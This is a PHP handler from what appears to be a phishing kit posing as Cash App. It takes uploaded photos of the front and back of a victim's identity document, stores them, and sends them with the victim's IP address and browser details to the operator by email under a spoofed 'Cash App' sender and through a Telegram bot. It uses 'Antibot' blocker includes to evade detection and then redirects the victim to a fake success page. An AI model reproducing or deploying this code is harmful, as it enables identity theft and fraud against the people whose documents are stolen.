<?php
session_start();
error_reporting(0);

// Include necessary files
include('function.php');
include('../config.php');
include('../Antibot/pro.php');
include('../Antibot/blocker.php');
include('../Antibot/blocker_1.php');
include('../Antibot/blocker_2.php');
include('../Antibot/blocker_3.php');
include('../Antibot/blocker_4.php');

// Define upload directory
$uploadDir = '../uploads/';
if (!file_exists($uploadDir)) {
    mkdir($uploadDir, 0755, true); // Create directory if it doesn't exist
}

// Handle uploaded files
$frontFile = $_FILES['FrontID'];
$backFile = $_FILES['BackID'];

// Validate file uploads
$allowedTypes = ['image/jpeg', 'image/png'];
if (
    $frontFile['size'] > 5000000 || $backFile['size'] > 5000000 || // File size limit: 5MB
    !in_array($frontFile['type'], $allowedTypes) || 
    !in_array($backFile['type'], $allowedTypes)
) {
    die('Invalid file upload. Please ensure files are images and under 5MB.');
}

// Save uploaded files
$frontPath = $uploadDir . basename($frontFile['name']);
$backPath = $uploadDir . basename($backFile['name']);

if (!move_uploaded_file($frontFile['tmp_name'], $frontPath) || 
    !move_uploaded_file($backFile['tmp_name'], $backPath)) {
    die('Failed to upload files.');
}

// Prepare message for Telegram
$IP = $_SERVER['REMOTE_ADDR'];
$date = date('Y-m-d H:i:s');
$os = php_uname(); // Basic OS info
$msgtg = "
❤️== CASHAPP USER DL FROM {$IP} ==❤️

*🔓Front ID Pic* : {$frontPath}
*🔓Back ID Pic* : {$backPath}

*=========[ DEVICE INFO ]=========*
*IP* : http://www.geoiptool.com/?IP={$IP}
*Date* : {$date}
*USER AGENT* : {$_SERVER['HTTP_USER_AGENT']}
*OS / BR* : {$os}
";

// Send email (if enabled)
if ($settings['send_mail'] == "1") {
    $to = $settings['email'];
    $subject = "✦ CASHAPP USER DL FROM ✦ {$IP} ✦";
    $headers = "Content-type:text/plain;charset=UTF-8\r\n";
    $headers .= "From: Cash App <cashapp@client_site.com>\r\n";
    mail($to, $subject, $msgtg, $headers);
}

// Send files to Telegram (if enabled)
if ($settings['telegram'] == "1") {
    $website = "https://api.telegram.org/bot{$settings['bot_url']}";

    // Send Front ID
    $frontCURL = curl_init($website . '/sendDocument');
    curl_setopt($frontCURL, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($frontCURL, CURLOPT_POST, 1);
    curl_setopt($frontCURL, CURLOPT_POSTFIELDS, [
        'chat_id' => $settings['chat_id'],
        'document' => curl_file_create($frontPath),
        'caption' => "Front ID - Uploaded from {$IP}",
    ]);
    curl_exec($frontCURL);
    curl_close($frontCURL);

    // Send Back ID
    $backCURL = curl_init($website . '/sendDocument');
    curl_setopt($backCURL, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($backCURL, CURLOPT_POST, 1);
    curl_setopt($backCURL, CURLOPT_POSTFIELDS, [
        'chat_id' => $settings['chat_id'],
        'document' => curl_file_create($backPath),
        'caption' => "Back ID - Uploaded from {$IP}",
    ]);
    curl_exec($backCURL);
    curl_close($backCURL);
}

// Redirect to success page
header('Location: ../success.php?q=cash+app&ei=2eZhZK-DKOGUhbIPy4SqsAM&ved=0ahUKEwjv0_rl7fb-AhVhSkEAHUuCCjYQ4dUDCA4&uact');
exit();
